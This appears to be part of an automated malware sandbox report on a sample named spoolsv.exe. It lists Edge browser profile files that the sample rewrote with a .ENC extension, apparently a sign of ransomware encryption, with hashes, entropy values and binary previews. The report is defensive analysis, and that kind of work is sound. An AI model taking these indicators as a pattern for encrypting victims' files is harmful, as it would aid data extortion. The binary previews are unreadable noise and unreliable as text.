                                                                                                                                                                                                                                                      Preview:f....O}h~. #2.m..*..k..+.S..R..*.....].jnM...W.B.u.<.$.*...1.j.....%.,.....R.U\~...1.Q".....4.~.q.f..."<..vT\..t.{S...?..h.).ly.Usj...!A.fy2.Mm@b..6.Jz....l.X.$.SFJbL....../.............@..E.........)...R.{...b.......FbG7T.B=..:.@.lp...I..4.7.).R*..gJL.K..5..:Mi.@XD.........X..HJ[.......v..U.=...I7...B....90M.6~+6;.{0.Z.}@...\v...`.B.v....I.Z.R5L...+.......i.(...3...4h.:.8...x.Z7.SH..B.w..f1P. ..p.../....x...#.@ZUY/%.....9T)7..J.x.!h;M........@.)n.9...>|.)YF....yO..W....z.A.,..d...g4........PJ...&.R.&.-..`sD2I`Q.5...<Ie.f.0Icm(.'.V...B...Z..PD.q[B..nm.J.qa....$>............u4/....K_2% .K.......j.h.B;lA.'=....7.)......(X..:p.t.......P=......~T..P.....TKQp*.W0..KZ..{. t..F.K.O...}.+..d...wn.T..n......m.;..NK.....o..G..9.UJ...H..xVN.....?1...f..CAt...#lp43M2.w...4.Z5..[<...]..w...L.Z.$.q..S?..P.Y.....%KD.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\extraction.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5328
                                                                                                                                                                                                                                                      Entropy (8bit):7.96862728690749
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:mxsP66GAwrsVqB2OykReQrILT4f/wwD+i+2d/xLQVbrx96YAOY4ioy:R1LqoOVRr07wD+i+2NiBrb6VOYSy
                                                                                                                                                                                                                                                      MD5:B3B7710E2E4ECE38A400C1568090F5A8
                                                                                                                                                                                                                                                      SHA1:1BCEF8652EA64337AEA12BF4A190E300F16A78DE
                                                                                                                                                                                                                                                      SHA-256:5702C4029B8F3B590B08DEFF8A1F70EB37DE5FD3C639FDA33D2E298D35B7556F
                                                                                                                                                                                                                                                      SHA-512:1F01216C388EB4CDDEBBD10BE8A60D83C02E926B5416009394FE4CA7812DCA90C1B247FF4A601684A158BE161C51F3E5B0F3FA4712405BAC2C07FEACC4EC1F61
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:f....O}h~. #2.m.{"......d8.*fd.bq..d.=]D.^..p]N....t.......+.l(..c._.1..-.m.....1<.zG...A.S.x..M...g.I4.. .6..x...z..*..B..%ssr.n.V..;..^eT*/)<..~.r...U..MU?.LI.u..N.....h....9T.)..Y......,gPR......o..R......*$...]...7..kc..R...&...h.q...I./..3.\_..*..t.)j...5.E1i..S{.n..,..WD..b,bg......W.t.YO.0.H.k.V.7..?....S..f..Ws;..}u.c..&."c.9.^......S,........~<G{*..L.(.a..{.>f.....X.......-..<./..E.....,..~..]..~..G.~..v-..(.j`......`.O..%x\.V....:..T6..W.......[[..P........W..[....V.|.&..".'O$.8..@.K..nS...-Zj.Y.R&..%....x.-......u....,..%++B&...)...A.&.-.L0..b......K=v.nb0..\P............C.....F....Cz..#.........>B..H9.......A<..X...C.#_H..Z..-...zq.;C..s..m^p.[..C_.s..3...#@.e=B.C........i.'.$../..<..t.{.!.....,.....J.....B....*..A...:.|.G...h. ...l.{....KG.....4.Ax8J.X`Q."].C.&.S..h_<.t<...?...;...r.....^.o..z.F...@P:YGLw$p..b...+..O.T.}m..>n..:..t.:..r.w.B..O v..G.hzB.G..Z...U.U..OK..'...(...9...sK%.#....K"d.;..G.5LO...KY.....!..o.[...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\manifest.fingerprint.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):5.996928094887359
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:eTLGVvQt7d6l78hDs61Bxbmn:eTLG+tElz6k
                                                                                                                                                                                                                                                      MD5:E7AD105BE6B20941020D84B4F8083008
                                                                                                                                                                                                                                                      SHA1:50AD924EC61E7815376CC8AAB2E637CDC74F907B
                                                                                                                                                                                                                                                      SHA-256:342357DEAA0661DED0F551453995AB3C27BADE28E6C02F9BA892422C87A296C1
                                                                                                                                                                                                                                                      SHA-512:E7E40970DE5D790E86D7FE679A31C2C893FF615949303CA1D6FAACB378C2D8ACFCA97033238D498DCB6F803D2014FF1F17985E8A8C82E95E22190E26CA8BB31F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.Hi..)._..;'O..6.P....4.\2...VX<>v.......W.oSNW..'.Y.f.}\xB;..6....S...h/...I.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):144
                                                                                                                                                                                                                                                      Entropy (8bit):6.73753151181392
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:HtKWTadeoGgoez6b5fZGqO+u2gdJtnKWUuiz8FURzffSpy9W/T:HJatoe8eqOPTtnKHJz8FURfW/T
                                                                                                                                                                                                                                                      MD5:B287781CFCF3CA6CDB0F961567F57B50
                                                                                                                                                                                                                                                      SHA1:180185FF2605EC156C497803582264B03B23E065
                                                                                                                                                                                                                                                      SHA-256:60AF63F3AFD114C5F438E73AE3331ECE02F09438AA92A5C76A84D4DD3EF56EA4
                                                                                                                                                                                                                                                      SHA-512:46A1D5D13F143D93E705D2B0F044FC6C2FCEAFADF8F67861763F151B1ABF264CCE2EFBF06FE9826A7C19646395E8F17228D375EBBE53BE267BC45B058C0E5FC6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.._C..D..eZ....N.uS....u.... c|.$.7-X.`&d..Q...S..Sc~*.P.T.#...+...p?..6H.t..C..q..Wm.......r.....k....-]...zn...X!.......J9..:.D.s"....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\app-setup.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):208
                                                                                                                                                                                                                                                      Entropy (8bit):6.986356424809447
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:vItX0whV3bbbVwTlt/a/koN/fqItlaRdib:glLhl/ba5ti/1qY0Re
                                                                                                                                                                                                                                                      MD5:88C491A8B73ECC17A4604E15E039FAD0
                                                                                                                                                                                                                                                      SHA1:8B8B82FE7FF00F529ACB8B87822114D53A52366E
                                                                                                                                                                                                                                                      SHA-256:CF5B6F1CD3B09E09E3951CBBDAC355EF08962CF6B3987202794431355DFAC678
                                                                                                                                                                                                                                                      SHA-512:0F4FE089DAAEFBAC08765AE3D22C505920DE40FFE758E44F5EBC6B60C25466ABC56A62833CB87D16D22D696FD86CC3832884A844AFE8C921D0E785D8A546FBE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:7lU[..s..i.z.SL.J*.......Z...#D...;..5.N,.Q.!...be.h....l..p/.....0U!.......!.i.X....).<....!.Wb.w3X.>..>.7s(.j......)S.lx.x.....F..%....M.[..]a}.-e..m<......c,E>..3.z.."tC..2..@5m...6....<q.qE.6N'I

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):128
                                                                                                                                                                                                                                                      Entropy (8bit):6.47051220694674
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:HtKWTadeoGtMf9gRuy004SmfMQWmhrPcytNbP7X5o+zn:HJaNfny0eoMQvhAytBTGM
                                                                                                                                                                                                                                                      MD5:A3125E6B88F5E932DB955D937DCC8D4E
                                                                                                                                                                                                                                                      SHA1:4FC7CA7CA72D42424D65EBC7838984A599178240
                                                                                                                                                                                                                                                      SHA-256:32857CB633BD5B9F591B7CF49C885410E3C009265A17529AEC50F2BA8C458E2B
                                                                                                                                                                                                                                                      SHA-512:989F84052E9D5188C9C0F7A9726D0900362C564E3371BA93E6484D4E3A2BD893446686C44D497994A0DC042C53D97AD85786FB46C98B0D0D73442F8805C84028
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.._C..D..eZ....N.uS....u.... c|. ..W.i..RB.%s..0:.Q...l....z"D......[i.8<MG...D..5..e..@^7.....q.y.....\..>....r\M)...H.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.html.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1968
                                                                                                                                                                                                                                                      Entropy (8bit):7.909949923157132
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:w5sdIJwxA8Ng95jN8tJdROrULAR/JdLhBVdeaC:w5skejNgLjN8tJarUL4bL3V4L
                                                                                                                                                                                                                                                      MD5:F59C1B80CD7A9A57E714B55FD555C1F4
                                                                                                                                                                                                                                                      SHA1:09985FE423AAE71406E5B39450EC97E0D6C10569
                                                                                                                                                                                                                                                      SHA-256:F7617BBAB238FF8F54E00BCB078818C0E9CF91352B022A43B6BD04358E6BEAAB
                                                                                                                                                                                                                                                      SHA-512:60A824D38FD5E8E2C0B836EFAD3A5C7BBDA387495951D0EDFFF5D349E276BB25C13D22DB1CDD247DF8E3D959BF56454F6AF2DA477F7998A95999A04CFE3CB658
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.j..5...5..6.6...G{..Is7Z. ..q.]q..Sx..H..{.g.. ...E.....i(....K....[.\..e.#\j.#.,..]U.R..j..'.$....Y.kV...,...O..<'^...I....V).eeR.J.. .<..v.n ...E.g.r.}z3x....b..By..+..C.......Z..AF..Q%M...........c.<J.p.........`..N\.H.X......._.1....U@.....J...Yu...../.G.-...d9.`k....#...Q..P........"...`.._:.?.#Cw.'.#.V...E..W2..p^....u.L../%.........-D.@....}.k...w..:H ....Y........B7.S.4...#..k.o.......t..f..`...P.@Fe..j5>">..6u..1B5...[0..|iB...v&n(.'6......*.7..7.......3r.....9.t...A-.V.....Z`......h.........5.b.b..Y"4+...9.?.6........~.......m^.O.f..Yc...'....;...N.9\.<9.T.pw./..#..........k.E......n.....t..R!F~Q!.H........@..7.l.&...K.wt)......A..r...~....:AAj(..I^\4..g...M..<.eF..{\.@;.a.F&..F@.1."..o.e.m.!.T.a~..].4-?..0....i".o.}.B`g.:.W.T.....pf.A.n.~. ..b.,7....f...c....0.(..~...E....L.....,r..|.....q....uJ..U..F.....HL..P&....e....q.^.Z..1G<.k..g d.\.=...QkS...W....eyNQ..E.jQ...#P.L3>.Y&O...a.JW..g..._....PJ,C..~....J?K....8..M.#.../r.R

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\First Run.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0\LICENSE.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1568
                                                                                                                                                                                                                                                      Entropy (8bit):7.859142165246519
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:jNWN+Ys0VNT7rLLAGAMGZ3tz/6bqieOpW:ENDNT3LNAMG+FeN
                                                                                                                                                                                                                                                      MD5:B6533BC5795162B8D8D67D83FE644512
                                                                                                                                                                                                                                                      SHA1:6C4D8F8D69887A114971FBAA5478B4DD5CB07630
                                                                                                                                                                                                                                                      SHA-256:B1085FE180CAFC1F479FC23805D00CC9FBEB22D9433FD56556EA6F69F8FB3B7B
                                                                                                                                                                                                                                                      SHA-512:B18331FB29248D469AF7E5400C721F50E4EB86911129CC373711EAE6AA198B2059402762964B40EDD2F9437E630CA3A3B0C3464435133B1793127E419F8C980A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:e...nR.G...@R.V.x.B&..W.>tO.....PeX^`..}b..y.vVAq..c.i.}.8n.^..s!I.s3..<...m:...(z..:U.}..+.\.a}.."....v.!........{3.]....4*(Ja.U..Aq....Q..8.[...4e..#].L+a&.*o.#.z.B9A..b..&..^.h...~......RU..I..+....... ./a..a..N.z..NM.ui.:.j'j.4Md.....h..n..%ac.ck.L.+..0.-kW....{k.q.... d.2z ...c.]...VA2...[....3..[..B.!...0B.*.(....2....#"..u>)mmI....S.$R{.:.Z...Y.FB.....|........#.@....i........W.qw8.}u...i}u.........W.q......%....2.*..s`,.D.ra.O&..+.7V.....,......T.6..$....^|>..!.).~..W.b...R.(,..{j.n.q.Q.k..2.t.e.'.i..^t..[.L._#G5..E.n8..Vp]Q..2]w..SV.f..G...A.].A...#....4....$...oZ.eA.M..<...J.m+.z.]....3...l.Bc..rE....W..l....[X|.Z..2...S..sA|<..ZX...;..)..\..Z.R.Cm....m..1...5..zb..!...M....!V..V...F.o.F':....H-A..n.T.<........pr...A.N...d..I#b..%..[.s..i:..."\.$HX...,..|&.".d....o.A.......L.J...5.K.Q......h....0.ROr...O0..G.cv.$&......^....^E...x.~.....s@.iH........IG!W..}7^.7n.(u.D....8`%DC....).ySc.N.......q.Q..)..F:.S......hJ7..H/I.......#.W....q...#

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials\0.0.1.4\manifest.fingerprint.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):5.978055907333272
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:NoVh2PLIUwSrLRvkD/H8Tn:6V0LIUnvEcTn
                                                                                                                                                                                                                                                      MD5:2AD500CDCCD1759E74ECE30408B6DFD7
                                                                                                                                                                                                                                                      SHA1:B2CC0B800997E00D4A73CC7F6AA18F4ACDD4CDA7
                                                                                                                                                                                                                                                      SHA-256:4752BFF0722AA672F74827567CFEE96D787E47934D5C0E2F94E5ACCACFFBD132
                                                                                                                                                                                                                                                      SHA-512:A6D8946A6158561D50A304437D3111F6F6816142C8A8B357E5B0E9182FFF09719B1C536473B6E786CEFDF85C4C5DE0636C7CC4D7F11A44B737841157FAFB74EC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.ME...s.._....DxQ.....'.]j.q&..k.0.._$3G....+.....?..5T........*P.)+.4..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials\0.0.1.4\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.376629167387827
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:4UGZo4AyNkrBQ:4Nk9rm
                                                                                                                                                                                                                                                      MD5:9F018618BE4693CBAA0F6B6EE0678EB0
                                                                                                                                                                                                                                                      SHA1:4C2F37CF2538F8DCA5D704F30C6169DDE25322EF
                                                                                                                                                                                                                                                      SHA-256:6FFA3AD8C3C7946C2CE1C2D7A1DE0CDC5D2B0E3A49C1AAAD39F7F8E0972BED41
                                                                                                                                                                                                                                                      SHA-512:020DABA22FC7A76BBE21900E708C7FDD6FA0E2098592842847A56C2D84402E0B9C20C461BA4F26931BD89E2F2D09984216CF0D6F115D5CEDD7152264AD35CC84
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:64T|.zl.]I.q...x.I.......k2%].y;..6.....Jf...d5

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0\manifest.fingerprint.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):6.146928094887358
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:EvZq0v8n+XS4EGDZIcZrUhWD4RSceV:GZqVnZGScShWkRSceV
                                                                                                                                                                                                                                                      MD5:C931F202F64BED86A2E71BF71E19F8FB
                                                                                                                                                                                                                                                      SHA1:7798817B9045B3369F36A6018CEF4DB2D49E931F
                                                                                                                                                                                                                                                      SHA-256:D982F32D39C58E00D3C9545ACF2490B61086F28A725F3AAB64A22B1A6A460763
                                                                                                                                                                                                                                                      SHA-512:9059694BD0A5997F38EB36BBD836D932DDCDA7456EE7CDA45D93CDBDC526C9E3F66FBFA63AF15DBE284C1CF29C43CCC84AA0F68BD0A9640EDF17BA1BED102F22
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:WV$.....dA..|.....1[..2.]..X.fK..O....my.xJw.;X.....> ..=1....j.........#

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):112
                                                                                                                                                                                                                                                      Entropy (8bit):6.526017645233248
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:HZfarsguuEABtT/MNvpcfhMTSE/j6e1lSen:ArzhEABJ/MNhcfhd26e1T
                                                                                                                                                                                                                                                      MD5:4E119C313857B441044735C793A8C92A
                                                                                                                                                                                                                                                      SHA1:82DF0B794CFBDDFC9CA4EA1986C5028087CAA085
                                                                                                                                                                                                                                                      SHA-256:5C8EC890FBC532511350BCA15EF5356AEC125218699504546FF8249F82472E41
                                                                                                                                                                                                                                                      SHA-512:68B4077297D3D9D09766EAA37F832B4C39C2266B5EE8F0D6DE07621B9F6B7A995429B20CC7539B16CB60B9DBFAEA089C736CC5C3ECB3C92563F96C58BED40BE1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:57.V......".<7...r..%.P.U.H..1.4.W.U.6UoJ..N.%.(*.8F.)e.y..A.)..B$....!0....:.#.E&..f.....cH..C...e..]e..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2090464
                                                                                                                                                                                                                                                      Entropy (8bit):7.999907139476519
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:49152:GzL8sIplE1kazFpMzaQsaNPanT9mgWYulmVuTAH8:GzL8zX8kQ5raNiiY8p
                                                                                                                                                                                                                                                      MD5:094C3760DC5086F547917DA0F356CB98
                                                                                                                                                                                                                                                      SHA1:04B7B798E735B7CE7692616EF2141EC4F4C648E0
                                                                                                                                                                                                                                                      SHA-256:D87C73C1D6A824FF4D4371B1844588F542483B3C86AE65E4233A7B0CC8C8CCBA
                                                                                                                                                                                                                                                      SHA-512:C1DC42A5659F9035ECB61949CCC32681E30F659F853B42A3C9F88A70F00242BA6F4D4DCC0D3C507C6297692BB2F7B77920A2635217D4D62C8D560767BDF52522
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..r..9..n7xr..#.=.m_...h.n..&q.K~~.:(.g.<U..i0k.......>....^!.9V.Q.k.n.S.H..{..1..~I..5....g*.0zp)..y...d}.3.......u=.u.7)#...'.n.Q.C..AI1'...,a-..+.g...7..5.12.1.~&kd...U.,bM..j...6...Z.J.Cw.l...c...O..4.......,.$..u.........b]/.(/3Q.....@a.-...N....J....1,........E..D+...zo.x... R!...y. U....]....p.....9j.3.h...Z..R...B.....GE1..P.%...8d.r...y..nZ.&.<u...ge.%..m.....J.sN.......M...../..\DhB.n..}^.....<....W...F.$.....A..4c...<U....b...y.Y..hw...t.Ux.. ~2)Y...2.Ym.U7...I,..1...C.........Y....9 ..a..:.@QU.../.K5><...C..I1.i..).._.g..T..f...wf_.9.i}..5....#...N...<.Y;......j.GZt..<Mf9<1&...K.8."@2..L.h.LJ.6.....&5.b.,.,.+......$....."Gcq={el..%Z.|.my.n}D,.q3...N.........7P..e.H.0^..%....b._...a.......j....o6..;~.O..p1W....7_[@m5... [..e..b...\.<<.,...Z.8./gF/.\g....d..sYd.m....w...UK.g....fw...yz.Ta\`%D..v.#$Gs....e..D.w.-..,...&0..?...|[K.w...Y.0..].7..P _P.;ec,.w..t0l..8J#2.........z.~.Gn|.....X...C...q6(....o.....Y.)..N../..a...X=U(W=..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983\manifest.fingerprint.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):6.037492001110315
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:AJhZ6uFuWjOKTIsFhlWePzmu:AJhZ6uBIs3lWed
                                                                                                                                                                                                                                                      MD5:8DA2CAD63A6323240A17121BF67674D7
                                                                                                                                                                                                                                                      SHA1:2AB9300DBBE0FDFE843DCD6C4A1089532A155CFC
                                                                                                                                                                                                                                                      SHA-256:C7F6B5B458027A61934730BBB5E55FAAB1952A0A23E515B117F97F48ACDCE9CD
                                                                                                                                                                                                                                                      SHA-512:BDBE2E31062B9EA36A79624D98BCEFD8CD9C3F131789AF51975D5ED83A86A8A5C72B411BB7A7F100E662B361E3D17668170D508ED938F56CCA593FFE6A64E511
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.r.S..k...;..~....Z...NpEGI../.(.w..*.8.....,..e4;"......$....~.#..{.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983\typosquatting_list.pb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3120
                                                                                                                                                                                                                                                      Entropy (8bit):7.945069305174866
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:zQq4BaWJJof4cq4bHDzPMCySpoVpl8GBY1o:zwBdqfrqcjzPMZj8G1
                                                                                                                                                                                                                                                      MD5:9838FFB34E32A71CC5B3AF1010DBF5DD
                                                                                                                                                                                                                                                      SHA1:0361E983E908447BC618D3DD23D5D02E0C6D787C
                                                                                                                                                                                                                                                      SHA-256:CE93C1BC1993D64408ABF2391D6646CE98A8DDA31B5969644708669A7199323D
                                                                                                                                                                                                                                                      SHA-512:616BBF9C3A57B443FE2A392991369C4FD457D9213F6CF7FFA6914764B09D8AE516B2A5EDD311B67B63FC2D21CC2B7DED875E7DF1FE9AC576D2B045D8BAF065C6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:]..f.2.i.}..n.~4.q..p......r..........=}/}W...{u..+|?Coa~..Kt..1.?^.d.A.d.i..83L..FN37@.).X..\5.+..*...t@...C........O.1.d..{..$..lVQ..d2.0u..@.....[%c...M_4.>w.....?(m..>Y8pta.s..x}[..........o6..k..Q...T.?M7_.6>..........N.NX[q.....\0...G1..`..\..m......-.-x....$UM.....q....!..PPk..`..B&*?..&.L.'..a[,DQ}L.d3.q....y.....5....Q/....o....W|....Z..>........a..5.C.|U....E*~6...........LJ.6.....`.....|.{-=.)..J..CN..DY.z"2..W=.0 ..2z..,.L...+^.(..~v"..kR..b.M..M..^...YT.)Ds.......\K..G..,m..<e/...s4..........S P..........=P..2..P.iz.X..t.i.."..uC.k.a.MX.T'~e..J.$....7b...)}..:......9.b^....7..........N..w.B.n...5*........4...2....t.T....Fd..E...%.1C;!.6..W.Qy....5..(.v.....-..y....y.g.q2...H.(6A9..&........0..9..IC..,-....l......c&.n:....'|.>0.m!..2^.;.G.f..e.......!.....\.|.$.......eV^W..5.....)..,].>b..*....OEL......Egi..3Z.N........Ec.[+..-....|..u.).[...q..r...E.*...A..a.^...#.N1j.&..Fo...A....~4..{Nx.5j...8..guE..L..c....%.I..V

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
